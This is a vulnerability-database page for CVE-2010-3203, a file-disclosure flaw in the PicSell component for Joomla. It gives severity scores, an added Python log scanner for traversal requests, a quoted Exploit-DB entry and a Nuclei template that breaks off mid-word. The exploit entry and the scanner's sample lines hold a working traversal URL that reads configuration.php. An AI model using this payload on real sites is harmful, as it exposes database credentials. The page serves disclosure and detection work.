CVE-2010-3203
Published: 2010-09-03
Priority: P3 | 39 | medium | 5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 8.52% (94.4th percentile)
Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xmlswf | com_picsell | — | — |
No detection rules found.
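A log check for the request pattern in the description, as an added example that is not part of the original page or of any project it cites: it flags requests to the `com_picsell` `dwnfree` task whose `dflink` value contains a `..` path segment, and goes slightly beyond the literal `../` in the text by also catching percent-encoded and backslash forms. The combined-log-format layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Aug/2010:10:00:00 +0000] "GET /index.php?option=com_picsell'
    '&controller=prevsell&task=dwnfree&dflink=../../../configuration.php HTTP/1.1" 200 1834',
    '192.0.2.11 - - [30/Aug/2010:10:00:05 +0000] "GET /index.php?option=com_picsell'
    '&controller=prevsell&task=dwnfree&dflink=%252e%252e%252fconfiguration.php HTTP/1.1" 200 1834',
    '198.51.100.7 - - [30/Aug/2010:10:01:00 +0000] "GET /index.php?option=com_picsell'
    '&controller=prevsell&task=dwnfree&dflink=sample.jpg HTTP/1.1" 200 52311',
    '198.51.100.8 - - [30/Aug/2010:10:02:00 +0000] "GET /index.php?option=com_content'
    '&view=article&id=104 HTTP/1.1" 200 9120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e) so encoded dots become visible."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_picsell_traversal(url):
    """True if the URL targets the PicSell dwnfree task with a '..' segment in dflink."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    first = lambda key: query.get(key, [""])[0].lower()
    if first("option") != "com_picsell" or first("task") != "dwnfree":
        return False
    for raw in query.get("dflink", []):
        # parse_qs decodes once; decode again and normalise backslashes.
        path = fully_decode(raw).replace("\\", "/")
        if ".." in path.split("/"):
            return True
    return False

def scan(lines):
    """Return the client address of every log line that matches the pattern."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and is_picsell_traversal(match.group(1)):
            hits.append(line.split()[0])
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A 200 response with an unusual body size on a flagged line is worth following up, since it suggests the file read succeeded rather than being rejected.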
Exploit-DB
Joomla! Component PicSell 1.0 - Local File Disclosure
exploitdb·2010-08-30
---
# Author: Craw
# Email: [email protected]
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications
[+] ExploiT :
http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]
[+] Example :
http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
Greetz @ LUXEMBOURG
Nuclei
Joomla! Component PicSell 1.0 - Arbitrary File Retrieval
nuclei·CVSS 5.0
A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
Template:
```yaml
id: CVE-2010-3203
info:
  name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to retrieve arbitrary files from the server.
  remediation: Upgrad
```